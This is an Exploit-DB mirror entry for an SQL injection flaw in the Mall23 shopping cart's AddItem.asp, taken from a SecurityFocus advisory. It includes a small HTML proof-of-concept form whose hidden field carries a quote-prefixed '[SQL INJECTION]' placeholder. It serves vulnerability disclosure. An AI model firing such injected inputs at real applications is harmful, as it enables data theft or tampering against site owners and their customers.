exploit-db-mirror/exploits/asp/webapps/26291.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
638 B
Text

source: https://www.securityfocus.com/bid/14898/info
Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
<form action="http://www.example.com/m23Basket/AddItem.asp?idProduct=6" method="POST">
<input type="hidden" name="idOption_Dropdown_2" value="'[SQL INJECTION]">
<input type="Submit" name="submit" value="Test Exploit">
</form>